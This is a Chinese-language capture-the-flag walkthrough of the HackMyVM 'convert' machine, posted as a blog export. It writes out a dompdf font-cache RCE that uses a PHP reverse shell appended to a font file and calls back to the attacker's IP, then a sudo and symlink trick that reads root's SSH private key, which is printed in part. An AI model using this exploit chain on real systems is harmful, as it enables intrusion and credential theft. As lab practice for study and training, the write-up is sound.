{"id":569,"date":"2024-04-15T21:09:04","date_gmt":"2024-04-15T13:09:04","guid":{"rendered":"http:\/\/162.14.82.114\/?p=569"},"modified":"2024-07-01T16:28:52","modified_gmt":"2024-07-01T08:28:52","slug":"569","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/569\/04\/15\/2024\/","title":{"rendered":"hmv[-_-]convert"},"content":{"rendered":"

convert<\/h1>\n

\"image-20240415152131741\"<\/div>
\n
\"image-20240415152115086\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
rustscan -a 192.168.0.111 -- -A<\/code><\/pre>\n
Open 192.168.0.111:22\nOpen 192.168.0.111:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 d8:7a:1e:74:a2:1a:40:74:91:1f:81:9b:05:7c:9a:f6 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNIydUr81eDokIoIALo7fmXcLh0LIL3AV01R8dkDa\/hstw76PQZrUQQH56OoVcNkTAXYGFlgjho\/kBiYVVSsLGY=\n|   256 28:9f:f8:ce:7b:5d:e1:a7:fa:23:c1:fe:00:ee:63:24 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKl\/6u9ozvyJq2EMKssVf0DlTM0fEBbFT5zvJ300ryg\n80\/tcp open  http    syn-ack nginx 1.22.1\n| http-methods: \n|_  Supported Methods: GET HEAD POST\n|_http-title: HTML to PDF\n|_http-server-header: nginx\/1.22.1\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u53ea\u626b\u5230\u4e86\u4e00\u4e2aupload<\/code><\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240415152257754\"<\/div>
\n
\"image-20240415152312538\"<\/div><\/p>\n
\u5c1d\u8bd5\u8f93\u5165\u81ea\u8eab\u7f51\u5740\uff0c\u751f\u6210\u4e86pdf\u6587\u4ef6\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n
\"image-20240415152648897\"<\/div><\/p>\n
\u672a\u66fe\u6267\u884c\uff0c\u627e\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
\"image-20240415201155080\"<\/div>
\n
\"image-20240415201207582\"<\/div>
\n
\"image-20240415152947149\"<\/div>
\n
\"image-20240415153403992\"<\/div><\/p>\n
\"image-20240415154256137\"<\/div><\/p>\n
\u4f46\u662f\u5e76\u672a\u5f39\u56de\u6765\uff0c\u7ee7\u7eed\u5bfb\u627e\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\uff1ahttps:\/\/exploit-notes.hdks.org\/exploit\/web\/dompdf-rce\/#exploitation<\/a><\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# head evil.css\n@font-face {\n  font-family: 'evil';\n  src: url('http:\/\/192.168.0.143:8888\/evil.php');\n  font-weight: 'normal';\n  font-style: 'normal';\n}\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# tail evil.php                                                          \n\n88\n\n\ufffd\ufffd\ufffdD*\ufffd\ufffdD*\ufffd\ufffd\ufffd7*8\ufffd        Iw!2654&#!"&5!#\ufffd\ufffdu\/CC\/\ufffd\/BB\/\ufffdu\ufffdwA\/\ufffdr\/AA\/\ufffd\/A\ufffd\ufffdY\ufffd\ufffd\ufffd        I\ufffd%!"3!26=4&#\ufffd\ufffd\ufffd.II.\ufffd.II.\ufffdGGGG\ufffd I@!"3!2654&##!"&5!!"35!+32654&#S\ufffd\ufffd'77''=&77&wA\ufffd? -- \ufffdA\ufffd\ufffd\n\n                \ufffd\ufffdM\ufffd-Y7\ufffd`\n                         0%A\ufffd-6\ufffd~=_<\ufffd\n                                    \u0488\ufffdH\u0488\ufffdH\ufffd\ufffd\ufffd\ufffd%\ufffd\n%\ufffd%\ufffd%\ufffd%\ufffd%\ufffd%\ufffd\nR\ufffd\ufffd\ufffdb\n3\ufffd\ufffd\/\n    \ufffd\nD\n\ufffd?      &\ufffd              !       \ufffd       6       \ufffd\n                                                                        #\n4^\n\ufffdjsglyphjsglyphStefan Str\ufffd\ufffderStefan Str\ufffd\ufffderhttp:\/\/stefanstraesser.eu\/http:\/\/stefanstraesser.eu\/MITMIT2015 Stefan Str\ufffd\ufffder2015 Stefan Str\ufffd\ufffderVersion 1.0Version 1.0jsglyphjsglyphjsglyphjsglyphRegularRegularjsglyphjsglyphFont generated by IcoMoon.Font generated by IcoMoon.\n<?php system("bash -c 'bash -i >& \/dev\/tcp\/192.168.0.143\/1234 0>&1'"); ?>\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# head exp.html\n<link rel=stylesheet href='http:\/\/192.168.0.143:8888\/evil.css'>\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.111 - - [15\/Apr\/2024 06:30:33] "GET \/exp.html HTTP\/1.1" 200 -\n192.168.0.111 - - [15\/Apr\/2024 06:30:33] "GET \/evil.css HTTP\/1.1" 200 -\n192.168.0.111 - - [15\/Apr\/2024 06:30:33] "GET \/evil.php HTTP\/1.1" 200 -\n^C\nKeyboard interrupt received, exiting.<\/code><\/pre>\n
\u5c1d\u8bd5\u8ba1\u7b97md5\uff0c\u7136\u540e\u8bbf\u95ee\u6fc0\u6d3b\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# echo -n http:\/\/192.168.0.143:8888\/evil.php | md5sum\n88b29c6a283b62aea4343982856990f4  -\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# curl http:\/\/192.168.0.111\/dompdf\/lib\/fonts\/evil_normal_88b29c6a283b62aea4343982856990f4.php<\/code><\/pre>\n
\"image-20240415184716553\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) eva@convert:\/var\/www\/html\/dompdf\/lib\/fonts$ ls\nCourier-Bold.afm            DejaVuSansMono-BoldOblique.ttf  Helvetica-Bold.afm         dompdf_font_family_cache.dist.php\nCourier-BoldOblique.afm     DejaVuSansMono-BoldOblique.ufm  Helvetica-BoldOblique.afm  dompdf_font_family_cache.php\nCourier-Oblique.afm         DejaVuSansMono-Oblique.ttf      Helvetica-Oblique.afm      evil_normal_88b29c6a283b62aea4343982856990f4.php\nCourier.afm                 DejaVuSansMono-Oblique.ufm      Helvetica.afm              evil_normal_88b29c6a283b62aea4343982856990f4.ufm\nDejaVuSans-Bold.ttf         DejaVuSansMono.ttf              Helvetica.afm.php          mustRead.html\nDejaVuSans-Bold.ufm         DejaVuSansMono.ufm              Symbol.afm                 poppins_bold_87c49bf24d72f01a4af573680817521f.ttf\nDejaVuSans-BoldOblique.ttf  DejaVuSerif-Bold.ttf            Times-Bold.afm             poppins_bold_87c49bf24d72f01a4af573680817521f.ufm\nDejaVuSans-BoldOblique.ufm  DejaVuSerif-Bold.ufm            Times-Bold.afm.php         poppins_bold_87c49bf24d72f01a4af573680817521f.ufm.php\nDejaVuSans-Oblique.ttf      DejaVuSerif-BoldItalic.ttf      Times-BoldItalic.afm       poppins_normal_a62832bf75823019dc29c5a9c470d64d.ttf\nDejaVuSans-Oblique.ufm      DejaVuSerif-BoldItalic.ufm      Times-BoldItalic.afm.php   poppins_normal_a62832bf75823019dc29c5a9c470d64d.ufm\nDejaVuSans.ttf              DejaVuSerif-Italic.ttf          Times-Italic.afm           poppins_normal_a62832bf75823019dc29c5a9c470d64d.ufm.php\nDejaVuSans.ufm              DejaVuSerif-Italic.ufm          Times-Roman.afm\nDejaVuSansMono-Bold.ttf     DejaVuSerif.ttf                 Times-Roman.afm.php\nDejaVuSansMono-Bold.ufm     DejaVuSerif.ufm                 ZapfDingbats.afm\n(remote) eva@convert:\/var\/www\/html\/dompdf\/lib\/fonts$ cd \/home\n(remote) eva@convert:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Feb 22 22:17 .\ndrwxr-xr-x 18 root root 4096 Feb 22 22:14 ..\ndrwx------  2 eva  eva  4096 Feb 24 10:09 eva\n(remote) eva@convert:\/home$ cd eva\n(remote) eva@convert:\/home\/eva$ ls -la\ntotal 32\ndrwx------ 2 eva  eva  4096 Feb 24 10:09 .\ndrwxr-xr-x 3 root root 4096 Feb 22 22:17 ..\nlrwxrwxrwx 1 root root    9 Feb 23 17:01 .bash_history -> \/dev\/null\n-rw-r--r-- 1 eva  eva   220 Feb 22 22:17 .bash_logout\n-rw-r--r-- 1 eva  eva  3526 Feb 22 22:17 .bashrc\n-rw-r--r-- 1 eva  eva   807 Feb 22 22:17 .profile\n-rw-r--r-- 1 root root    1 Feb 24 10:10 pdf_gen.log\n-rw-r--r-- 1 root root 2736 Feb 23 21:36 pdfgen.py\n-rw-r----- 1 eva  eva    33 Feb 23 17:16 user.txt\n(remote) eva@convert:\/home\/eva$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\neva:x:1000:1000:eva,,,:\/home\/eva:\/bin\/bash\n(remote) eva@convert:\/home\/eva$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ && run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }\n#\n(remote) eva@convert:\/home\/eva$ cd \/var\/www\/html\n(remote) eva@convert:\/var\/www\/html$ ls -la\ntotal 24\ndrwxr-xr-x 4 eva  eva  4096 Feb 23 15:11 .\ndrwxr-xr-x 3 root root 4096 Feb 23 10:35 ..\ndrwxr-xr-x 4 eva  eva  4096 Feb 22 19:21 dompdf\n-rw-r--r-- 1 eva  eva  3098 Feb 23 15:11 index.php\n-rw-r--r-- 1 eva  eva  1130 Feb 22 15:23 style.css\ndrwxr-xr-x 2 eva  eva  4096 Apr 15 16:00 upload\n(remote) eva@convert:\/var\/www\/html$ cd ..\/\n(remote) eva@convert:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Feb 23 10:35 .\ndrwxr-xr-x 12 root root 4096 Feb 23 10:35 ..\ndrwxr-xr-x  4 eva  eva  4096 Feb 23 15:11 html\n(remote) eva@convert:\/var\/www$ cd ..\n(remote) eva@convert:\/var$ ls -la\ntotal 48\ndrwxr-xr-x 12 root root  4096 Feb 23 10:35 .\ndrwxr-xr-x 18 root root  4096 Feb 22 22:14 ..\ndrwxr-xr-x  2 root root  4096 Apr 15 13:17 backups\ndrwxr-xr-x 11 root root  4096 Feb 23 19:05 cache\ndrwxr-xr-x 27 root root  4096 Feb 23 16:57 lib\ndrwxrwsr-x  2 root staff 4096 Sep 30  2023 local\nlrwxrwxrwx  1 root root     9 Feb 22 22:10 lock -> \/run\/lock\ndrwxr-xr-x  8 root root  4096 Apr 15 12:50 log\ndrwxrwsr-x  2 root mail  4096 Feb 22 22:10 mail\ndrwxr-xr-x  2 root root  4096 Feb 22 22:10 opt\nlrwxrwxrwx  1 root root     4 Feb 22 22:10 run -> \/run\ndrwxr-xr-x  4 root root  4096 Feb 22 22:16 spool\ndrwxrwxrwt  4 root root  4096 Apr 15 16:09 tmp\ndrwxr-xr-x  3 root root  4096 Feb 23 10:35 www\n(remote) eva@convert:\/var$ mail\nbash: mail: command not found\n(remote) eva@convert:\/var$ cd backups\/\n(remote) eva@convert:\/var\/backups$ ls -la\ntotal 28\ndrwxr-xr-x  2 root root  4096 Apr 15 13:17 .\ndrwxr-xr-x 12 root root  4096 Feb 23 10:35 ..\n-rw-r--r--  1 root root 10802 Feb 23 19:06 apt.extended_states.0\n-rw-r--r--  1 root root  1116 Feb 23 10:35 apt.extended_states.1.gz\n-rw-r--r--  1 root root    65 Feb 22 22:34 apt.extended_states.2.gz\n(remote) eva@convert:\/var\/backups$ cd ..\/tmp\n(remote) eva@convert:\/var\/tmp$ ls -la\ntotal 16\ndrwxrwxrwt  4 root root 4096 Apr 15 16:09 .\ndrwxr-xr-x 12 root root 4096 Feb 23 10:35 ..\ndrwx------  3 root root 4096 Apr 15 12:50 systemd-private-f49fbb326e3a46fe90bdb67c6ab1e685-systemd-logind.service-ENrSBE\ndrwx------  3 root root 4096 Apr 15 12:50 systemd-private-f49fbb326e3a46fe90bdb67c6ab1e685-systemd-timesyncd.service-K8yvIC\n(remote) eva@convert:\/var\/tmp$ cd ..\n(remote) eva@convert:\/var$ cd \/home\/eva\n(remote) eva@convert:\/home\/eva$ ls -la\ntotal 32\ndrwx------ 2 eva  eva  4096 Feb 24 10:09 .\ndrwxr-xr-x 3 root root 4096 Feb 22 22:17 ..\nlrwxrwxrwx 1 root root    9 Feb 23 17:01 .bash_history -> \/dev\/null\n-rw-r--r-- 1 eva  eva   220 Feb 22 22:17 .bash_logout\n-rw-r--r-- 1 eva  eva  3526 Feb 22 22:17 .bashrc\n-rw-r--r-- 1 eva  eva   807 Feb 22 22:17 .profile\n-rw-r--r-- 1 root root    1 Feb 24 10:10 pdf_gen.log\n-rw-r--r-- 1 root root 2736 Feb 23 21:36 pdfgen.py\n-rw-r----- 1 eva  eva    33 Feb 23 17:16 user.txt\n(remote) eva@convert:\/home\/eva$ cat user.txt\nf2be48d6f922bfc0a9bf45b22887c10d\n(remote) eva@convert:\/home\/eva$ cat pdfgen.py\nfrom os import path\nfrom time import time\nfrom weasyprint import HTML, CSS\nfrom urllib.parse import urlparse\nfrom argparse import ArgumentParser\nfrom logging import basicConfig, INFO, error, info, exception\n\ndef prune_log(log_file, max_size=1):\n    try:\n        log_size = path.getsize(log_file) \/ (1024 * 1024)\n        if log_size > max_size:\n            with open(log_file, 'w'):\n                pass\n            info(f"Log file pruned. Size exceeded {max_size} MB.")\n            print(f"Log file pruned. Size exceeded {max_size} MB.")\n    except Exception as e:\n        print(f"Error pruning log file: {e}")\n\nlog_file = '\/home\/eva\/pdf_gen.log'\nprune_log(log_file)\nbasicConfig(level=INFO, filename=log_file, filemode='a',\n            format='%(asctime)s - %(levelname)s - %(message)s')\n\ndef is_path_allowed(output_path):\n    blocked_directories = ["\/root", "\/etc"]\n    for directory in blocked_directories:\n        if output_path.startswith(directory):\n            return False\n    return True\n\ndef url_html_to_pdf(url, output_path):\n    block_schemes = ["file", "data"]\n    block_hosts = ["127.0.0.1", "localhost"]\n    blocked_directories = ["\/root", "\/etc"]\n\n    try:\n        start_time = time()\n\n        scheme = urlparse(url).scheme\n        hostname = urlparse(url).hostname\n\n        if scheme in block_schemes:\n            error(f"{scheme} scheme is Blocked")\n            print(f"Error: {scheme} scheme is Blocked")\n            return\n\n        if hostname in block_hosts:\n            error(f"{hostname} hostname is Blocked")\n            print(f"Error: {hostname} hostname is Blocked")\n            return\n\n        if not is_path_allowed(output_path):\n            error(f"Output path is not allowed in {blocked_directories} directories")\n            print(f"Error: Output path is not allowed in {blocked_directories} directories")\n            return\n\n        html = HTML(url.strip())\n        html.write_pdf(output_path, stylesheets=[CSS(string='@page { size: A3; margin: 1cm }')])\n\n        end_time = time()\n        elapsed_time = end_time - start_time\n        info(f"PDF generated successfully at {output_path} in {elapsed_time:.2f} seconds")\n        print(f"PDF generated successfully at {output_path} in {elapsed_time:.2f} seconds")\n\n    except Exception as e:\n        exception(f"Error: {e}")\n        print(f"Error: {e}")\n\nif __name__ == "__main__":\n    parser = ArgumentParser(description="Convert HTML content from a URL to a PDF file.")\n    parser.add_argument("-U", "--url", help="URL of the HTML content to convert", required=True)\n    parser.add_argument("-O", "--out", help="Output file path for the generated PDF", default="\/home\/eva\/output.pdf")\n\n    args = parser.parse_args()\n    url_html_to_pdf(args.url, args.out)\n(remote) eva@convert:\/home\/eva$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n(remote) eva@convert:\/home\/eva$ find \/ -writable -type f 2>\/dev\/null\n.......\n.......\n(remote) eva@convert:\/home\/eva$ sudo -l \nMatching Defaults entries for eva on convert:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser eva may run the following commands on convert:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/python3 \/home\/eva\/pdfgen.py *<\/code><\/pre>\n
\u751f\u6210\u5bc6\u94a5ssh\u767b\u5f55<\/h3>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# ssh-keygen -t rsa         \nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/root\/.ssh\/id_rsa): \/home\/kali\/temp\/convert\/eva\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/convert\/eva\nYour public key has been saved in \/home\/kali\/temp\/convert\/eva.pub\nThe key fingerprint is:\nSHA256:Nu49c+gtdrdKDNZ7Ura2kMhkuZdodSrRn9\/ifE2XIjQ root@kali\nThe key's randomart image is:\n+---[RSA 3072]----+\n|                 |\n|                 |\n|                 |\n|           E     |\n|        S O = + .|\n|       o * X @ +o|\n|        . B.% B.o|\n|       . o*=o*oo+|\n|        .oo*o+=+o|\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# ls -la\ntotal 52\ndrwxr-xr-x  2 kali kali  4096 Apr 15 07:16 .\ndrwxr-xr-x 43 kali kali  4096 Apr 15 03:20 ..\n-rwxr-xr-x  1 kali kali 10552 Apr 15 06:02 51270.py\n-rwxr-xr-x  1 kali kali  7844 Apr 15 06:02 51293.py\n-rw-------  1 root root  2590 Apr 15 07:16 eva\n-rw-r--r--  1 root root   563 Apr 15 07:16 eva.pub\n-rw-r--r--  1 kali kali   137 Apr 15 06:29 evil.css\n-rw-r--r--  1 kali kali  2051 Apr 15 06:13 evil.php\n-rw-r--r--  1 kali kali    65 Apr 15 06:25 exp.html\n-rw-r--r--  1 kali kali  3911 Apr 15 03:25 revershell.php\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# python3 -m http.server 8899\nServing HTTP on 0.0.0.0 port 8899 (http:\/\/0.0.0.0:8899\/) ...\n192.168.0.111 - - [15\/Apr\/2024 07:16:44] "GET \/eva.pub HTTP\/1.1" 200 -\n^C\nKeyboard interrupt received, exiting.\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# ssh eva@192.168.0.111 -i eva\nThe authenticity of host '192.168.0.111 (192.168.0.111)' can't be established.\nED25519 key fingerprint is SHA256:UcMTODcLY+1hSC+QX0GB7UwPKAyADkaMiEptJMVYv6M.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.0.111' (ED25519) to the list of known hosts.\neva@192.168.0.111's password: \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# ssh eva@192.168.0.111 -i eva\nLinux convert 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\neva@convert:~$ <\/code><\/pre>\n
\u53e6\u4e00\u8fb9\uff1a<\/p>\n
(remote) eva@convert:\/home\/eva$ mkdir .ssh                                       \n(remote) eva@convert:\/home\/eva$ cd .ssh\n(remote) eva@convert:\/home\/eva\/.ssh$ wget http:\/\/192.168.0.143:8899\/eva.pub\n--2024-04-15 16:46:44--  http:\/\/192.168.0.143:8899\/eva.pub\nConnecting to 192.168.0.143:8899... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 563 [application\/vnd.exstream-package]\nSaving to: 'eva.pub'\n\neva.pub        100%[=========================================================================>]     563  --.-KB\/s    in 0s\n\n2024-04-15 16:46:44 (120 MB\/s) - 'eva.pub' saved [563\/563]\n\n(remote) eva@convert:\/home\/eva\/.ssh$ ls\neva.pub\n(remote) eva@convert:\/home\/eva\/.ssh$ mv eva.pub authorized_keys<\/code><\/pre>\n
\u5c1d\u8bd5\u811a\u672c\u5229\u7528<\/h3>\n
\u7136\u540e\u5c31\u662f\u5c1d\u8bd5\u5229\u7528\u524d\u9762\u4e00\u5f00\u59cb\u627e\u5230\u7684\u90a3\u4e2a\u8bfb\u53d6\u6587\u4ef6\u3002\u3002\u3002\u3002<\/p>\n
eva@convert:~$ ls -la\ntotal 68\ndrwx------ 3 eva  eva   4096 Apr 15 17:15 .\ndrwxr-xr-x 3 root root  4096 Feb 22 22:17 ..\nlrwxrwxrwx 1 root root     9 Feb 23 17:01 .bash_history -> \/dev\/null\n-rw-r--r-- 1 eva  eva    220 Feb 22 22:17 .bash_logout\n-rw-r--r-- 1 eva  eva   3526 Feb 22 22:17 .bashrc\nlrwxrwxrwx 1 eva  eva     17 Apr 15 16:57 flag -> \/root\/.ssh\/id_rsa\n-rw-r--r-- 1 eva  eva   1026 Apr 15 17:05 index.html\n-rw-r--r-- 1 root root 24883 Apr 15 17:44 pdf_gen.log\n-rw-r--r-- 1 root root  2736 Feb 23 21:36 pdfgen.py\n-rw-r--r-- 1 eva  eva    807 Feb 22 22:17 .profile\ndrwxr-xr-x 2 eva  eva   4096 Apr 15 16:47 .ssh\n-rw-r----- 1 eva  eva     33 Feb 23 17:16 user.txt\n-rw------- 1 eva  eva    737 Apr 15 17:15 .viminfo\neva@convert:~$ ln -s \/root\/.ssh\/id_rsa root\neva@convert:~$ sudo -l\nMatching Defaults entries for eva on convert:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser eva may run the following commands on convert:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/python3 \/home\/eva\/pdfgen.py *\neva@convert:~$ sudo \/usr\/bin\/python3 \/home\/eva\/pdfgen.py -U root -O \/tmp\/flag1\nPDF generated successfully at \/tmp\/flag1 in 0.10 seconds\neva@convert:~$ cd \/tmp\neva@convert:\/tmp$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.143 - - [15\/Apr\/2024 17:54:21] "GET \/flag1 HTTP\/1.1" 200 -<\/code><\/pre>\n
\u7136\u540e\u672c\u673a\u5c1d\u8bd5\u8bfb\u53d6\uff1a<\/p>\n
\"image-20240415203059996\"<\/div><\/p>\n
\u5c1d\u8bd5\u6062\u590d\u4e00\u4e0b\u683c\u5f0f\uff1a<\/p>\n
-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAwuT74ZxkltpDIeLfVydo0SgS+nqREGX8xfU1j8\/Et0D13dLbHsPS \naAVgEoDgU8\/CY5P17Lto0GouPRsjCSEEF7i8E6+0k5HOa2VCnu4wlIhDWo6xVDjhsrQuBn \nLUzTnU5rwUzVGH4EvZpwucdzPP8Z\/bmecJ17NETjhKfhEV9u07kiiBwZXjSYeYUUY\/qCbE RJg4nKRwoR187fF2jfo7gRqCFw9LXWCUHjnQNvPqsbAAzbiG0c7Y7VjCga\/kuf12WL92G7 lFTK7BvLXlbUUVDBcbd8wiPkXTUXQsoJLWfU7uamN2vx17DWbH42PQ6Ldoo9IG9Y5Pogh1\nfkJNjNLAuq3ezhqVWKuVGowRT1cQ0azjkE3y4YKoMce3ddLs+jQXgl+hncdk5WkVW\/RS0p\n27wx0MOPuBEiv3a5NHZew0OL8WOk+MMy4LE\/coK7zumFdYUbzP2qohPzyMc\/Rkpp\/Pui4i\nduAXaVuR5lbII+WZugD2OzbjPuRDNxu0ss0yqNZnAAAFiFbLnC5Wy5wuAAAAB3NzaC1yc2 \nEAAAGBAMLk++GcZJbaQyHi31cnaNEoEvp6kRBl\/MX1NY\/PxLdA9d3S2x7D0mgFYBKA4FPP\nwmOT9ey7aNBqLj0bIwkhBBe4vBOvtJORzmtlQp7uMJSIQ1qOsVQ44bK0LgZy1M051Oa8FM \n1Rh+BL2acLnHczz\/Gf25nnCdezRE44Sn4RFfbtO5IogcGV40mHmFFGP6gmxESYOJykcKEd\nfO3xdo36O4EaghcPS11glB450Dbz6rGwAM24htHO2O1YwoGv5Ln9dli\/dhu5RUyuwby15W\n1FFQwXG3fMIj5F01F0LKCS1n1O7mpjdr8dew1mx+Nj0Oi3aKPSBvWOT6IIdX5CTYzSwLqt\n3s4alVirlRqMEU9XENGs45BN8uGCqDHHt3XS7Po0F4JfoZ3HZOVpFVv0UtKdu8MdDDj7gR \nIr92uTR2XsNDi\/FjpPjDMuCxP3KCu87phXWFG8z9qqIT88jHP0ZKafz7ouInbgF2lbkeZW\nyCPlmboA9js24z7kQzcbtLLNMqjWZwAAAAMBAAEAAAGAObSMAcKJJANPAj8G6uq\/xcIMUH 